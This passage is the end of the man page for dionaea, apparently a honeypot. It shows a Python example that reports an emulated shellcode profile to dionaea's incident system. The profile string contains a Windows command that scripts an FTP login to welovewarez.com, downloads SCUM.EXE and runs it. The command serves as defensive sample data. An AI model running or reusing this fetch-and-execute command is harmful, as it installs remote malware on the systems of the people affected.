2870          p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2871          from dionaea.core import incident
2872          i = incident("dionaea.module.emu.profile")
2873          i.set("profile", str(p))
2874          i.report()
2875
2876       · genindex
2877
2878       · modindex
2879
2880       · search
2881

AUTHOR

2883       dionaea
2884
2886       2015, dionaea
2887
2888
2889
2890
28910.7.0                            Jan 31, 2019                       DIONAEA(1)
Impressum